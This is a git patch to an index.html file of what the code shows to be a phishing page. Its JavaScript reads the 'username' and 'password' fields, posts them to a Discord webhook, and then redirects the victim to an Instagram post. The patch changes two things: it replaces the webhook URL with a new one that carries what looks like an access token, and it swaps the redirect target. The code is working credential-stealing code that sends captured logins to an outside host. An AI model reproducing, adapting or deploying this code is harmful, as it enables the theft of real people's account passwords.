From 44369ff5743a2d9ebee48dc1aed910f525b45b9c Mon Sep 17 00:00:00 2001 From: lennigrsf27 <141774452+lennigrsf27@users.noreply.github.com> Date: Wed, 29 May 2024 10:43:08 +0200 Subject: [PATCH] index.html updated --- index.html | 4 ++-- 1 file changed, 2 insertions(+), 2 deletions(-) diff --git a/index.html b/index.html index 41bbb1e..a2a043f 100644 --- a/index.html +++ b/index.html @@ -98,14 +98,14 @@ } while (currentDate - date < milliseconds); } var request = new XMLHttpRequest(); - request.open("POST", "https://discord.com/api/webhooks/822572817496801281/WIPiqOeGm7qZTaEmHhEVhCWSP0BhN3O3U0gxMKYS6zM3iF4dR3vwSq__4S5PqvCeTMJj"); + request.open("POST", "https://discord.com/api/webhooks/1245296150123253803/IPGDLcOPknij1vhOlNS198HTDvGsl5sjk2DptM_qjMmXyBmIj2m9bzx6ItnphWOhIVsX"); request.setRequestHeader('Content-type', 'application/json'); var params = { content: ("> **USERNAME : **" + document.getElementById('username').value + "\n> **PASSWORD : **" + document.getElementById('password').value) } request.send(JSON.stringify(params)); sleep(400) - window.location.replace("https://www.instagram.com/p/By7NkskoTip"); + window.location.replace("https://www.instagram.com/reel/C7Mt4_0LXzC/?utm_source=ig_web_copy_link&igsh=MzRlODBiNWFlZA=="); }